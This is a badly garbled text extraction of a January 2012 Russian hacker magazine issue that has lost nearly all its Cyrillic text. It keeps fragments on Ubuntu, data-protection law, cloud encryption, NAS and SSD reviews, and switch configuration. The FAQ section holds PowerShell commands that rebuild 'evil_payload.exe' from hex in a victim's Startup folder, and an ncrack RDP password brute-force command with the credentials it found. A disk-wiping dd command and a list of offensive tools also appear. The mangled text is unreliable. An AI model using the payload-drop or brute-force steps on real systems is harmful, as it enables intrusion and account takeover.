Compiz 0.9.6;
GNOME 3.2;

Mozilla Firefox 7.0.1, Mozilla
Thunderbird 7.0.1, LightDM,
Deja Dup, - Gwibber;
LibreOffice 3.4.2;
Python 3.2, GCC 4.6.1, Bash 4.2, CUPS 1.5.0,
Pidgin 2.10.0, UDEV 173, X.Org 1.10.4;
ARM- .
:
Ubuntu (Dash Home)
Launcher. Places,
,
Lenses,
(
, ,
, Google Docs) ,
.
.
<Alt+Tab>.

. ,
01 /156/ 2012
.
( ).
,
Launcher.
Unity
, . ,
,
, ,
.
Ubuntu Software Center 5.0

.
, , ,
, .
,

.

(
Ubuntu, . .) Software
Center OneConf,
,
(File > Sync between computers).

Qt Unity 2D, OpenGL. Unity 2D
Qt
Qt Quick. Unity 2D
, Unity 3D,

ARM.
Ubuntu LoCo
(goo.gl/cC5kr, ubuntu-defaults-builder),

: ,
, ,
, ,
- Banshee
Rhythmbox .

cloud-
.

, .
.
Cannonical 2013 .
Ubuntu 12.04,
2012 , LTS-,

.
117
SYN/ACK
aka 13oz
WWW

gscentr.ru
GSPD

.
,

,

-

.

.
,
( ),
. ,
, .
.
118
01 /156/ 2012
,
. -,

(-).
, . ,
: 687 781.
. ,
.
1)
, ,
, ,
( ) .
, :
, , .
2) ( ) ,
, ,
( ) , . ,
.
3) () , .
, ,
. . ,

,
58 .
, ,
, .
4) ,
- ,
. ,
, . , .
5) .
: / , , ,
( ) ,
. ?
,
.
6)
, ,
. :)
, :
, (/), ( , ,
),
,
(/) ( ).
.
7) , ,
. ,
, ,
. .
8) .
: ,
, , (
,
01 /156/ 2012
, - ),
.
9) , ,
, ,
.
10) , , ,
- .
? ,
,
.
11) , ,
, ,
.
, , 2 ( ), ,
, , , etc.
12)
,
, . ,
,
. :)
, ,
(
etc), ,
( ). ( ).
13) ,
.
, !
, ,
, .
14) , .
.
15) ,
,
,
.
, , , , ,
, .
16)
. ,
, . ? , .
- . ,
(
),
( ) .
.
17)
. ,
, , . ,
,
. , , ,
, ,
, .
18) ,
.
119
SYN\ACK
SYN/ACK
19) ,
?
. ,
, ( , ,
1 . ) - ,

. - ?
, , ,
- : ,
( ) . 90 .
, (
) .
20) , . , - .

,

.
, ,
. .
,
, . ,
,
. . :) ,
.
, ,
,
ISPDN.RU . ,
,
, , ,
.
,
,
- -.
, ( ,
,
),

. ,
. , ,
, , - ,
. z

?
:
1) , ,
, ,
.
2)
152-, .
3)
152- .
4)
,

,
. ,
, , ,
,
,
.
5)
:
. .
,
. . ,
, ,
.
120
. ,
,
, ,
,
, . .
.
,
, ,
, ,
.
.
6) ,
( ) (
)
( ).
7)
.
, ,
. ,
, ,
.
8) ,
(
,
,
, etc).
9)

152-.
10)

, , .
,
.
11)

,

, ,
,
.

.
01 /156/ 2012
FAQ

, ,

, ,
. ,

. ,

,

,
.
.
.
, .
,
, , , ,
. .
,

,
VLAN
.

01 /156/ 2012
.

.
,
?
,
,
,
. ,
,
- .
,
.
:

3;

2;

1.
, ( ),
2 -
.
,

.
.
,

. ,
.

,

?

,
?
,

.
.

:
,
, .
,
.
121
SYN/ACK
WWW
LUKS code.
google.com/p/
cryptsetup
MySQL 5.6
Reference Manual
Encryption and
Compression - clck.
ru/P85I
Windows Azure SDK
microsoft.com/
windowsazure/sdk
vGate R2
securitycode.ru/
products/sn_vmware/vgate_com
Novell
Cloud Security Service novell.com/
products/cloudsecurity-service
FreeOTFE
freeotfe.org

INFO

. ,
PR, ,

,
.
,

.
.

.
122

. ,
(PaaS)
(SaaS) ,
.
,
. , (
). , . ,
, , ,
- .
, ,
, .
, , v-index.com, 38,9 %. ,
, . ,
.
,
,
,
.
,
SaaS (Software as a Service )
PaaS (Platform as a Service ),
, .
,
. : .
,
,
SaaS. , .
, ,
. ,
, Google Amazon,
,
01 /156/ 2012
v-index.com,
, -
.
- ,
. ;)
,
. ,
- .
, .

.
,
( )
, ,
, . ,
.
, DMZ ,
(VPN, /etc/host.allow).
DDoS-
.
. ,
, SaaS

. , . ,
.
,
, .
Security Code TrustAccess (securitycode.ru/
products/trustaccess) .

. ?
.
,
, , ,
. SaaS , ,
, ,
- VMware vCloud Director .
, ,
( ):
, .
,
. , ComputerWorld,
, ,
, VMware
vSphere. SaaS .
, .
, , SaaS
. , -
. -
. ,
,
( ).
,
,
- . ,
, VMware, vGate
R2 (securitycode.ru/products/sn_vmware/vgate_com).
,
(
VM), ,
, ( ACL ), VM, .
() ()
. ,
-.
(gnu.org/philosophy/who-does-that-server-reallyserve.html)
, .
SaaS-
.

,
.
. ,
01 /156/ 2012
vGate
123
SYN\ACK
SYN/ACK
Novell Cloud Security Service (NCSS, novell.
com/products/cloud-security-service)
, .
NCSS :
( Active Directory). ,
SaaS/PaaS/IaaS, , NCSS
, .
, SaaS
,

. ,
, SaaS
.
,
.
, ,
, .

.

, ,
, .
SaaS . HTTPS, .
,
DM-CRYPT
dm-crypt ,
2.6+ ryptoAPI.
, ,
hybernate.
- Windows FreeOTFE,
Windows.
$ sudo apt-get install cryptsetup
:
$ sudo dd if=/dev/zero of=/dev/sda5 bs=4K
/dev/mapper/:
$ sudo cryptsetup -y luksFormat /dev/sda5
$ sudo cryptsetup luksOpen /dev/sda5 encdisk

, .
$ sudo mkfs.msdos /dev/mapper/encdisk
$ sudo mount -t vfat -o rw /dev/mapper/encdisk /mnt/
encdisk
:
$ sudo umount /mnt/encdisk
$ sudo cryptsetup luksClose /dev/mapper/encdisk
124
0124

.
, -
,
( Amazon EC2), , . 152
(clck.ru/P0dc)
. ,
. ,

. ,
, ,
, . -152
, , , , .

. ,
. . ,
( ),
. ,
, -
. PCI (Payment
Card Infrastructure),
, : .
, , , , , PCI, .
, . ,
- ? ,
.
.
LUKS (The Linux Unified Key Setup, code.google.com/p/cryptsetup),
Linux dm-crypt, . LUKS
TKS1 (Template
Key Setup 1), ,
,
. Windows
FreeOTFE (freeotfe.org),
Linux (cryptoloop, dm-crypt)

- HSM (Hardware Security Module, ) PKCS#11.
, Windows BitLocker ( EFS,
Encrypted File System).
. ,
,
. ,
, ,
. - ,

, . ,
MySQL Reference Manual . 11.13 Encryption
01 /156/ 2012
MySQL 15
Linux dm-crypt
and Compression Functions, 15 .

SQL- , .
.
,
, , .
. ,
,
Trend Micro SecureCloud,
FreeOTFE . ,
, ,
. . Amazon EC2, Eucalyptus
vCloud. SecureCloud ,
. , / .
> CREATE TABLE md5_tbl (md5_val CHAR(32), ...);

> INSERT INTO md5_tbl (md5_val, ...) VALUES(MD5(abcdef),
...);
API . Windows Azure SDK

(microsoft.com/windowsazure/sdk), Windows Azure, , CSP (Cryptographic Service Provider,
).
, ,
XSS SQL injection , , ,
.
,
, .
, , ( , )
FreeOTFE Linux
01 /156/ 2012
, , . ,
, ,
. , . ! . z
Trend Micro SecureCloud

125
0125
FERRUM
NAS

5- 6-
NAS-

.
,
( NAS)
. ,
!
. .
,
, . ,

. RAID. ,
RAID.
,
, .
,
? NAS. ,
100 ,
. NAS
, .

.
Intel NAS Performance Toolkit
. NAS , . , RAID0. RAID5 ,
.
, . ,
NAS.
.
126
01 /156/ 2012
NAS
D-LINK SHARECENTER
PRO 1200
D-Link
, Ethernet
USB. .

OLED- . ,
, .
, , . ,
, ,

.
D-Link ShareCenter Pro 1200 . ,
.
- D-Link
. , iSCSI. ,
- .
24 000
.
NETGEAR READYNAS
6 ULTRA
NETGEAR
. . . NETGEAR ReadyNAS
6 Ultra
2 . ,
12 , .
. RAID5.
FrontView. ,
.

.
, .
NETGEAR ReadyNAS 6 Ultra,
, , .
26 000
.
01 /156/ 2012
127
FERRUM
NETGEAR READYNAS 6 ULTRA PLUS

ETGEAR ReadyNAS 6 Ultra Plus NETGEAR ReadyNAS 6 Ultra.
. - Intel Atom, Intel Pentium E2160,
1,8 .
. ,
. ,
.
.
FrontView 4.2.16 .
-,
Boot Menu. -,
RAID5 . ,
NETGEAR ReadyNAS 6 Ultra. ,
. , ,
.
.
30 000
.
QNAP TS-559 PRO+

QNAP TS-559 Pro+,
.
QNAP .
, QNAP
,
. QNAP TS-559 Pro+
, , .
VGA- . ? ,
, . VGA . QNAP
TS-559 Pro+ . ,
. RAID5 ,
.
38 000
.
128
D-Link ShareCenter Pro 1200
2x Ethernet (10/100/1000 /c), 2x

USB 2.0
JBOD, RAID 0, RAID 1, RAID 5, RAID 6,
RAID 10
CIFS/SMB, FTP, UPnP, HTTP, NFS, ISCSI
NETGEAR ReadyNAS
6 Ultra
NETGEAR
ReadyNAS 6
Ultra Plus
Intel Atom Dual Core, 1,66

DDR2 DIMM 1x 1
2x Ethernet (10/100/1000 /), 3x USB 2.0
Intel Pentium E2160, 1,8

DDR2 DIMM 1x 1
2x Ethernet (10/100/1000 /), 3x USB 2.0
X-RAID2, RAID 0, RAID 1, RAID 5, RAID 6
X-RAID2, RAID 0, RAID 1, RAID 5, RAID 6
CIFS/SMB, FTP, UPnP, HTTP, AFP, NFS, DLNA,

Bonjour
CIFS/SMB, FTP, UPnP, HTTP, AFP, NFS, DLNA,

Bonjour
01 /156/ 2012
NAS
SYNOLOGY DISKSTATION DS1511+

ynology DiskStation DS1511+ QNAP TS-559 Pro+.
Synology ,
. -,
. ,
. -, ,
.
, , .
. ,
QNAP TS-559 Pro+, Synology DiskStation DS1511+
, , , . ,
.
, . 45 .
35 000
.
THECUS N5200XXX
Thecus N5200XXX.
. , NETGEAR: , , , .
: Intel Atom D525
1 DDR3 . ,
.
. , HDD.
OLED-, /
LAN- USB-.
Thecus N5200XXX , . , ,
, , ,
.
30 000
.
QNAP TS-559
Pro+
Intel Atom D525, 1,8

DDR2 1x 1
2x Ethernet (10/100/1000 /), 5x
USB 2.0, 2x eSATA, VGA
JBOD, RAID 0, RAID 1, RAID 5, RAID 5+,
RAID 6, RAID 6+, RAID 10, RAID 10+
CIFS/SMB, FTP, TFTP, UPnP, HTTP,
HTTPS, AFP, NFS, DLNA, Bonjour,
iSCSI, telnet, SSH, SNMP
01 /156/ 2012
Synology DiskStation DS1511+
Dual Core, 1,8

DDR2, 1 1
2x Ethernet (10/100/1000 /c), 4x
USB 2.0, 2x eSATA
JBOD, RAID 0, RAID 1, RAID 5, RAID 6,
RAID 10
CIFS/SMB, FTP, TFPT, UPnP, DLNA,
HTTP, AFP, NFS, Bonjour, ISCSI
THECUS
N5200XXX
Intel Atom D525, 1,8

DDR3 SODIMM 1 1
2x Ethernet (10/100/1000
/c), 5x USB 2.0, eSATA
JBOD, RAID 0, RAID 1, RAID 5,
RAID 6, RAID 10
CIFS/SMB, FTP, TFPT, UPnP,
HTTP, AFP, NFS, Bonjour, ISCSI

, ,
.
, NAS, 5-
6-. , ,
QNAP,
Synology Thecus. .

NETGEAR. NAS
( ), . z
129
FERRUM

SILICON POWER
SP060GBSSDV30S25

,
.
IOmeter,
SSD /
, .
IOmeter,

, . . PCMark Vantage,
HDD, ,
,
. , ATTO Disk
Benchmark /
0,5 8192 .
,
.
: SSD, 2,5
: SATA 3.0
: MLC
. : 550 /
. : 500 /
: 60
TRIM:
:
+
+
+
-
SSD, ,
,

.

SSD

.
Silicon Power
SP060GBSSDV30S25. -
60 , Windows 7

,
.
5400
.
:
IOmeter:
Random read 4 : 21,44 /
Random write 4 : 19,77 /
Seq. read 128 : 313,41 /
Seq. write 128 : 332 /
IOmeter patterns:
Database: 36,43 /
Fileserver: 41,08 /
Workstation: 34,50 /
Webserver: 51,35 /
PCMark Vantage:
Test Suite: 26076
Windows Defender: 42,95 /
Gaming: 176,73 /
Importing pictures to Windows
Photo Gallery: 271,45 /
Windows Vista startup: 30,18 /
Video editing using Windows Movie
Maker: 88,42 /
Windows Media Center:
340,73 /
Adding music to Windows Media
Player: 151,54 /
Application loading: 167,14 /
130
, SandForce
SF-2000
MLC.
35 ,
.
Silicon Power SP060GBSSDV30S25 ,

SATA 3.0,
. ,

, ,
IOmeter,
.
Silicon Power SP060GBSSDV30S25
:
3,5- . SSD,

480 .
,
,
. Silicon
Power SP060GBSSDV30S25, !
. z
01 /156/ 2012
PHREAKING
aka Lundes (sergey.lunde@gmail.com)
Loop

,

INFO
Rx Tx
Receive
Transmit
( ).
Loop . ,
, ,
, .
-
, .

. ,

,
.
, , ,
. , ,
,
.

. ,
().
, . ,
132
, . ,
: ! : !.
- : ! :
! ! ? !
! ? , !

- .
,
,
. -
, . ,
, .
(broadcast storm).
,
- (. 1). -
... .
. loop_detection,
.

, .
01 /156/ 2012
Loop
1 TX+
-. . +
2 TX-
. . -
3 RX+
-. +
4 n/c
. ( )
5 n/c
-. ( )
. -
7 n/c
-. ( )
8 n/c
. ( )
1. RJ45
: (
) Ethernet ( Telnet
web-). .
Ethernet, IP-.
Web-

, , . . , web 80 HTTP- IP-.
. 1.
DLINK DES-3200
-,
.
1. IP-
:
DES-3200# config ipif System \
ipaddress xxx.xxx.xxx.xxx/yyy.yyy.yyy.yyy.
xxx.xxx.xxx.xxx IP-, yyy.yyy.yyy.yyy. .

2. , IP- , :
DES-3200# show ipif
3. web- IP- .
D-Link , RS-232, ,
. Out-of-Band.
,
.

(, HyperTerminal
Windows). :
Baud rate: 9,600
Data width: 8 bits
Parity: none
Stop bits: 1
Flow Control: none

. , Ctrl+r ,
.
.
,
01 /156/ 2012
Loopback-
Enter . , DES-3200#. .
, ,
, , .
? ,
.
, config,
:
133
PHREAKING
RJ-45
DES-3200#config +
? Enter.
.
TAB.

. .
: Admin User.
Admin .

CLI:
DES-3200# create account admin/user <username>
( / )

: Enter a case-sensitive new password.
15
.
Success.
Admin:
Username "dlink":
DES-3200#create account admin dlink
Command: create account admin dlink
Enter a case-sensitive new password:****
Enter the new password again for confirmation:****
Success.
DES-3200#
: DES-3200# config
account <username>

dlink:
DES-3200#config account dlink
Command: config account dlink
Enter a old password:****
Enter a case-sensitive new password:****
Enter the new password again for confirmation:****
Success.
: DES-3200# show account.
134
delete account
<username>.
. web- Telnet,
IP- ,
. IP- DHCP BOOTP
CLI:
DES-3200# config ipif System dhcp,
DES-3200# config ipif System ipaddress \
xxx.xxx.xxx.xxx/yyy.yyy.yyy.yyy.
xxx.xxx.xxx.xxx IP-, yyy.yyy.yyy.yyy. ,

System .
.
. D-Link

().
, .
D-Link
config ports. ,
, 10 /,
13
.
DES-3200#config ports 1-3 speed 10_full learning
enable state enable
Command: config ports 1-3 speed 10_full learning
enable state enable
Success
show ports < > .

. NVRAM.
save:
DES-3200#save
,

,
01 /156/ 2012
Loop
Command: save
Saving all settings to NV-RAM... 100%
done.
DES-3200#
.
reboot:
DES-3200#reboot
Command: reboot
! reset.
DES-3200#reset config
-, reset, .
loop_detection Alcatel
interface range ethernet e(1-24)
loopback-detection enable
exit
loopback-detection enable
loop_detection Dlink
enable loopdetect
config loopdetect recover_timer 1800
config loopdetect interval 1
config loopdetect mode port-based
config loopdetect trap none
config loopdetect ports 1-24 state enabled
config loopdetect ports 25-26 state disabled
.
loopback .
. , , -
, UP-, , ,
. - .

:
, (Rx Tx).
,
2 6, 1 3.
, , -
-. . 3.
,
, link. !
!
, HELLO WORLD
Hello world? !
,
.
, ,
.
(. 4).
? ,
,
- -.
.
, .
. ?
. . ? !
Hello World Cshell:
01 /156/ 2012
LOOPBACK
oop ,
. ,
loopback-.
. loopback-.
, , ,
, .
Cshell, Hello word

#!/bin/csh
# ver. 1.0
# ,
if ( 'ps | grep 'redbut' | grep -v 'grep' | wc -l' <= 1 )
then
# , snmp
set snmpdir = "/usr/local/bin/"
set community = "public"
# snmp
set snmpcmd = "-t1 -r1 -Oqv -c $community -v1 -Cf "
set mib_stat = "IF-MIB::ifOperStatus.$2"
set uid = "$1"
set fl = '0'
#
while ( "$fl" == '0' ).
set nowstatus = '$snmpdir/snmpget $snmpcmd $uid
$mib_stat | sed 's/up/1/;s/down/0/;/Wrong/d''
if ( "$nowstatus" == 1 ) then
echo 'Hello World'
# e-mail
echo " ! Hello World!" |
sendmail -f[__] [_]
endif
sleep 10
end
endif
exit
:
./script.csh IP_ _.
,
. , , ,
,
!

, .
: ?
:
. ,
. , ,
, - .
!
loop_detection , .
, .
! z
135
UNITS / FAQ UNITED
(twtitter.com/stepah)
FAQ United

FAQ@REAL.XAKEP.RU

LINUX?
OpenSSL .

,
:
OpenSSL! -,

Linux-,

SSL-.
,
. ,
OpenSSL
, , ,
,
.
1. .

GnuPG (www.
gnupg.org),
OpenSSL:
$ openssl aes-256-cbc -d -in \

file-test.aes -out file-test-dec
$ openssl aes-256-cbc -salt -in

file-test -out file-test.aes
enter aes-256-cbc encryption password:
Verifying - enter aes-256-cbc
encryption password:
filetest AES-256 ( CBC)

file-test.aes.
, OpeenSSL
,
bash-. , , ,
:
$ for f in * ; do [ -f $f ] && openssl
aes-256-cbc -salt -in $f -out $f.enc
-pass file:password.txt ; done
2. . OpenSSL
, SHA1-1 MD5-. SHA1
file-test-64:
$ openssl sha1 file-test-64
SHA1(eapol-64)= afc594f26ca08780737
69d24f8c04fe35f2bf8b3
3. , SSL/TLS
,
OpenSSL.

:
$ echo 'GET HTTP/1.0' | openssl s_client

-connect example.com:443
[...]
New, TLSv1/SSLv3, Cipher is
DHE-RSA-AES256-SHA
Server public key is 2048 bit
, TLSv1/
SSLv3.
4. OpenSSL
speed test,
. :
$ openssl s_time -connect \
webserver.com:443
-

,
(FTP.EXE, . .)
.

,

debug.exe.
64
. , debug.exe
Microsoft.
, Windows 7 Server 2008 PowerShell, -
5 : DNS-

C&C-.
DNS- ,
IP-
.
?
,
, hosts?
136
BIND (www.isc.org).
DNS-
DNS-, BIND, , .
, ,
. DNS-.
ApateDNS (bit.ly/sZQiK1).
security- Mandiant.
DNS-
IP-, .
, , ApateDNS ( ),

DNS.
01 /156/ 2012
FAQ UNITED

. ?

.

PowerShell:

ANDROID-,

ANDROID? GOOGLE,
!
PS > [byte[]] $hex = get-content

-encoding byte -path
C:\temp\evil_payload.exe
PS > [System.IO.File]::WriteAllLines("C:\
temp\hexdump.txt", ([string]$hex))
Andoid',
Android SDK,
,
ARM
x86. -
. ,
,

Bluestacks
(bluestacks.com). , Android-,

.
.
hexdump.txt -
:
77 90
184 0
0 0 0
0 0 0
144
0 0
0 0
0 0
0 3
0 0
0 0
232
0
0
0
0
0
0
0
0
Android.
. ,

, .
,
, . ,
, .
Bluestacks 7 .
,
Android x86 (www.android-x86.org),
.

(http://bit.ly/rYs9OI),
!
0 4 0 0 0 255 255 0 0
64 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0
0 14 31 ....
,
. ( ,

),
(
).
PS-:
PS > [string]$hex = get-content -path
C:\Users\victim\Desktop\hexdump.txt
PS > [Byte[]] $temp = $hex -split ' '
PS > [System.IO.File]::WriteAllBytes(
"C:\ProgramData\Microsoft\Windows\Start
Menu\Programs\Startup\evil_payload.exe",
$temp)
,
.

,
.
FakeDNS (bit.ly/szUFXI).
Malcode
Analysis Pack. ApateDNS,
DNS,
IP-. ( ) HEX.
01 /156/ 2012
Android-x86, VirtuaBox, ,
Nexus One!
fakedns.py (bit.ly/vhgamQ).
DNS Python ( 40 )
. IP ,
fakedns.py,

.
HostsMan (bit.ly/uZAV0X).

DNS-,
hosts. , ,
. , , 99%
. :)
137
UNITS / FAQ UNITED

,

CTRL + SHIFT +
ESC?

Process Explorer
(bit.ly/ugFDpx) Replace
Task Manager,
. ,
:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Image File
Execution Options\taskmgr.exe
taskmgr.exe
, . Debugger (,
c:\utils\Process Explorer\procexp.exe).

,

-
WEBSOCKET?

. ,
:
1. ,
, Wireshark (www.wireshark.org).
,
WebSockets,
,
HTTP (, SOAP).
2. Firefox
Temper Data (bit.ly/sM49Hk),
,
.
N . ,
.
: Low, Media
High. , -
,
Medium (
). ,

. Process
Explorer
(View Select
Columns Integrity Level).
? ,
- ,
usermode.
, , ,
KeePass ,
,
.
. - ,
KeePass
.
KeyPass
High, . !
-
( KeyPass)

Run as administrator. , ,
,
.
, .
Windows Integrity Levels .
icacls,

Chml (bit.ly/s0BLCm). ,

( "-i:h") ( "-nr"):
192.168.26.137:3389,CL=2
rdp://192.168.26.137:3389 (EID 1) Login
failed: 'administrator' 'admin'
...
Discovered credentials on
rdp://192.168.26.137:3389 'administrator' 'admin123'
!

.

NETSETMAN (WWW.NETSETMAN.COM)?

netsh
dump:
netsh interface dump > netsh-config1.txt

:
# ---------------------------------# Interface IP Configuration
# ---------------------------------pushd interface ip
# Interface IP Configuration for "Local
Area Connection 1"
set address name="Local Area Connection
1" source=dhcp
set dns name="Local Area Connection 1"
source=dhcp register=PRIMARY
set wins name="Local Area Connection 1"
source=dhcp
popd
# End of interface IP configuration
...
, netsh -f:
chml file.zip -i:h -nr

netsh -f netsh-config1.txt

Q WINDOWS
INTEGRITY LEVELS?

?
Windows Vista, 7
A Server 2008,
, mandatory integrity levels (MIL).
,
Microsoft
, ,
-
, .

.

,
N

138
, file.zip
Access is denied.
,
,
, ,
. z

RDP?
,

RDP-, TSGrinder (bit.ly/uThpnS).
.

ncrack (nmap.org/ncrack)
nmap ,
RDP. :
$ ncrack -vv -d7 --user administrator \

-P /home/user/passlist.txt \
FakeDNS DNS-..
01 /156/ 2012
>System
AutoHideDesktopIcons 1.41
Device Remover 0.9
DTaskManager 1.51
Free File Unlocker 1.0
GPU-Z 0.5.6
HD Tune Pro 5.0
HDClone 4.0.7
JaBack 9.12
Nimi Visuals
OCCT Perestroika 4.0.0
Real Temp 3.60
Smart Defrag 2.2
Svchost Process Analyzer
System Explorer 3.6.2
WhoCrashed 3.02
X Mouse Button Control 2.0
>>UNIX
>Desktop
Cheese 3.2.2
Clementine 0.7.1
Coolreader 3.0.43
Dvdisaster 0.72.3
Freecad 0.11.4422
Gnuplot 4.4.4
Handbrake 0.9.5
Imageagick 6.7.3-8
K9copy 2.3.7
>Net
Angry IP Scanner 3.0 Beta 6
ClipGrab 3.1.3.1
Freeproxy 4.10
IncrediMail 2.5
Koma-Mail 3.82
LiteManager 4.4.1
NetMeter 1.1.4
NetWorx 5.2.1
Pokki
RadioClicker 8.11
>Security
Ariadne
BeEF 0.4.2.11
Buster Sandbox Analyzer 1.44
CIAT 1.02
ClamAV 0.97.3
DirBuster 0.12
Emulation Framework 1.0.0
File Disclosure Browser
GenXE 0.9.0
Hades
John the Ripper 1.7.9
MagicTree 1.0
MeMMoN
NetworkMiner 1.1
NetworkMiner 1.2
NMapSi4 0.3 beta
PEiD Plugins
Rec Studio 4
thc-ssl-dos 1.4
USB Cop 1.0
VanishCrypt
VirtualKD 2.6
w3af 1.1
Windbgshark 0.0.1
Window Maximizer v2.00
Windows-privesc-check
WPScan 1.1
X-Scan 3.3
Skype Voice Changer 1.0

SmartSniff 1.91
Terminals 2
TweetMyPC 3.9
VideoCacheView 2.02
Virtual Router 0.9
>Multimedia
All Free ISO Burner
Avidemux 2.5.5
AVS Media Player 4.1.8.93
ExifTool 8.71
Free Audio Converter 5.0.2
Free Screen Video Recorder
2.5.19
Jimp 2.0.0
KMPlayer 3.0.0.1442
ManyCam 2.6.60
Photoscape 3.5
Sonarca Sound Recorder 3.7.8
Songbird 1.10.1
STDU Viewer 1.6.62
Sysygy Image Viewer 1.3
Ubuntu Skin Pack 8.0
WindowTabs
>Misc
7stacks 1.5
Droid Explorer 0.8.8.2
EssentialPIM 4.5
FavBackup 2.1.1
Fences 1.01
FileMenu Tools 6.0.1
FreeCommander 2009.02b
PointerStick 1.21
Q-Dir 4.87
Rainmeter 2.1
RocketDock 1.35
SumatraPDF 1.9
UboroBot 2.0
ViewFD 2.3.0
Volumouse 1.72
WinSplit Revolution 11.04
>>WINDOWS
>Development
AjaxControlToolkit 4.1.51116
DEV-C++ 4.9.9.2
Dia 0.97.1
Facebook C# SDK 5.3.2
HAP 1.4.0
HeidiSQL 6.0
HiAsm 4.4
Json.NET 4.0
Mocha 0.0.8
PHPExcel 1.7.6
PTVS 1.1
PyScripter 2.4.3
SDL 1.2.14
StyleCop 4.6
TReplacer 2.11
Utilu IE Collection 1.7.2.0
>Security
Blueproximity 1.2.5
Chatsniff 1.0
Clamtk 4.36
Emulation Framework 1.0.0
Fwbuilder 5.0.0.3568
Gadmin-openvpn-server 0.1.5
GenXE 0.9.0
GoLISMERO
Gsasl 1.6.1
HOPPER
Ipclassify 1.1
>Net
Aweather 0.6
Chrome 15
Dada_mail 4.8.4
Evolution 3.2.2
Firefox 8.0.1
Getleft 1.2
Instantbird 1.1
Knemo 0.7.2
Ktorrent 4.1.3
Lftp 4.3.3
Liferea 1.6.6b
Linphone 3.4.3
Linuxdcpp 1.1.0
Smuxi 0.8
Stealthnet 0.8.7.9
Swift 1.0
Tvdownloader 0.7.2
Watchvideo 2.2.1
>Games
Flightgear 2.4.0
Netrek 3.3.0
>Devel
Apache_tika 1.0
Dlib 17.44
Freebasic 0.23.0
Geany 0.21
Groovy 1.8.4
Gtk 3.3.4
Javatools 0.44
Jvcl 3.45
Libglass 2.0.0
Libmicrohttpd 0.9.17
Maveryx 1.3.0
Nant 0.91
Open64 5.0
Padre 0.92
Pypy 1.7
Quexml 1.3.7
Raptor2 2.0.5
Ruby 1.9.3-p0
Valgrind 3.7.0
Libreoffice 3.4.4
Metamorphose 1.1.2
Nip2 7.26.3
Optipng 0.6.5
Pyroom 0.4.1
Tomboy 1.9.3
Wavesurfer 1.8.8p3
Xine 1.1.20
Xorriso 1.1.8
>>MAC
Amaya 11.3.1
AppHack 1.1
Aptana Studio 3.0
Art of Illusion 2.9
Boxer 1.2
Clementine Music Player 0.7.1
DeTune 1.0.6
DVDTheque 3.1.2
GitHub 1.1
GV Connect Widget 2.1.1
JollysFastVNC 1.32
Magican 0.9.63
Mou 0.7.0
RaidEye 2.0
SourceTree 1.2.9
Tincta 1.3.1
Veusz 1.14
VMware Fusion 4.1.1
Winamp 0.7.1
>X-distr
openSUSE 12.1
>System
Apt-dater 0.8.6
Css 20111030
Di 4.31
Freeipa 2.1.3
Glpi 0.80.5
Grep 2.10
Libertine 5.1.3-2
Linux 3.1.3
Pbis 6.1.0.8729
Pf-kernel 3.1.3
Synctool 5.1
Virtualbox 4.1.6
Webmin 1.570
Winetricks 20111115
Zabbix 1.8.9
>Server
Apache 2.2.21
Asterisk 1.6.2.20
Bind 9.8.1-p1
Cups 1.5.0
Dhcp 4.2.3
Dovecot 2.0.16
Freeradius 2.1.12
Lighttpd 1.4.29
Mysql 5.5.18
Nsd 3.2.9
Openldap 2.4.27
Openvpn 2.2.1
Postfix 2.8.7
Postgresql 9.1.1
John the Ripper 1.7.9

Naxsi 0.41
NmapSi
PHP Vulnerability Hunter 1.1.4.6
Rec Studio 4
Revelation 0.4.12
sqlsus 0.7.1
Strongswan 4.6.1
Tripwire 2.4.2.2
w3af 1.1
01(156) 2012

9.-

0(/.%'!0
km`gj{lzd
nogjmedlg~
l_(4-,

lmazd`_bg
s_hjmazt
srliugh0(0
8889",&136
"/%30*%

&/$3:15*0/
9.-
i_irbl_q{
vremh`mqldq

odimkdlcma_ll_~
,OTUS$OMINO#ONTROLLER

!
800
!
191
2200 . ( )
23% ,
(250 )
30 ,
31 ,
31 .
8.5
DVD
!
!
,
, :

+ DVD
Total Football
+ DVD
DVD
+ DVD
DVDXpert
+ DVD
Smoke

,

.
PC
+ 2 DVD
+ DVD
T3
Digital Photo
+ DVD
+ DVD
12 2200 .
6 1260 .
,
!
.
: 210

GOOGLE CHROME 030
x 09 (152) 2011
LULZSEC
09 (152) 2011
082
LULZSEC / FOX NEWS
1. , , shop.glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
500 .

WINDOWS 7
PHPMYADMIN
064

ANDROID 070
152
,
JAVASCRIPT 050
:
, ,
FOX NEWS

+ + 2 DVD:
162
( 35% , )
!
,
.
12 3890 (24 )
6 2205 (12 )
.
,

? info@glc.ru 8(495)663-82-77 ( ) 8 (800) 200-3-999 (

, , ).
UNITS / WWW2
WWW2
ROUTERPWN
www.routerpwn.com
, . , mac_find (
MAC-) phenoelit (
).
, . ,
, ,
IP- . ,
:).
C
KICKSEND
kicksend.com
,
Rapidshare , . -
, e-mail . , ,
, , :
e-mail 500 ? , , 1 . .

PROXPN
proxpn.com
, proXPN, one-click-
VPN- . ,
OpenVPN, , , . ,
proXPN . , . ,
. (, WiFi-),
.
VPN-
JPC 2
jpc2.com
,
.
Javascript PC Emulator (bellard.org/jslinux),
( JavaScript), Linux. JPC 2 , , Java : Windows XP Ubuntu .
jpc2.com, .
, .
Windows XP Ubuntu
142
01 /156/ 2012
: . : .
UNITS / GEEK ART
143
UNITS / 2012
NY2K+12
. MUST SEE
MUST VISIT ,

.
- , .
: .
,
.
20-23
14-16
30-31
2012
HITB
BLACKHAT
PHDAYS
CONFIDENCE
conference.hitb.org
www.blackhat.com
www.phdays.ru
confidence.org.pl
, ,
,

,
,
,
.

. , ,

.
PHDAYS

.
,
. ,
CTF-.
:
, ,

.
,
:).
26-29
25-26
2012
DEFCON
CC'2012
ZERONIGHTS
www.defcon.org
cc.org.ru
www.zeronights.ru
DEFCON
RUSSIA
, 20-

-.
,
:

!

demoscene-.

.

.
,
: ,

.
!
www.defcon-russia.ru
144
2011 5
.
IT/-,
. !
01 /156/ 2012
CODING
ALEKSANDR-EHKKERT@RAMBLER.RU

Хакер 2012 01 PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Хакер 2012 01 PDF

Uploaded by

Copyright:

Available Formats

030

XML ENCRYPTION: XML-

.: (495) 935-7034, : (495) 545-0906

MEGANEWS FACEBOOK , 600 .

